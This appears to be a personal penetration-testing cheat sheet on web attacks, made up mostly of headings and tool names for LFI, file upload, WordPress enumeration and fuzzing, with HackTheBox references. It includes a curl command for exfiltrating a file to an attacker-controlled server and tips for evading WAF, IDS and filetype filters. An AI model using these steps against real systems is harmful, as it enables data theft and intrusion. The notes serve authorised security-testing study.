Web Notes

TODO: Need to pull web notes out of the OS Agnostic section (and then rename that to something better!)

Checklist

HTTP Response Codes

Headers

HTTP Authorization headers

HTTP Security Headers

Header Bypass Methods

Cookies

JavaScript

Ruby

Python2

Edit cookies in chrome

Settings -> Advanced Settings -> Privacy -> Content -> Cookies

or "Edit This Cookie" plugin

Edit cookies in firefox

Preferences -> Privacy -> Show Cookies

or "Cookies Manager+" addon

Local File Inclusion (LFI) / Remote File Inclusion (RFI)

Common and/or useful files to check for when exploiting Local File Inclusion (for both Linux and Windows): https://github.com/tennc/fuzzdb/tree/master/dict/BURP-PayLoad/LFI

LFI - Retrieve HTML/PHP files without executing

File Upload

HTTP PUT

Cadaver

JPG to PNG shell

Upload Files through POST

OpenVAS Vulnerability Scanner

Misc

IPv6

primer: Ippsec:HacktheBox - Sneaky

ip6tables - iptables for ipv6

HTTP Authentication Types

XPATH Dump

whatismybrowser.com - research User-Agent strings

Use curl to exfiltrate file on remote server (from attackers box): curl -d @/<file> <remote server>

in order to proxy tools that have no proxy option: create burn proxy 127.0.0.1:80 Ippsec:HacktheBox - Granny & Grandpa

vulnerability testing for webdav (or other file upload vulns!): davtest

bypassing filetype filters with http MOVE command to rename allowed filetype Ippsec:HacktheBox - Granny & Grandpa

Wordpress enumeration: wpscan -u <url> [--disable-tls-checks]

pull Google cached webpage if regular site not loading: cache:https://<somewebsite>

Virtual Host Routing: substitute IP for hostname to get different results

hydra against http wordpress login walkthrough: IppSec:HacktheBox - Apocalyst

web application fuzzer: wfuzz

Web site "flyover" surveillance: Aquatone "is a tool for visual inspection of websites across a large amount of hosts and is convenient for quickly gaining an overview of HTTP-based attack surface" - from the author (see link). Visual dirbuster?

Crawl web pages for keywords - useful for password/vhost enumeration lists

Common checks

IP conversion

Injecting IPs when '.' is disallowed: convert the standard "dotted decimal" format to decimal, or hex value using -ip2dh. The sending or receiving computer will usually automatically convert it to a format that it can use. This is a great way to bypass WAF, IDS, or other tools that filter on IPs.

If you like this content and would like to see more, please consider buying me a coffee!

Last updated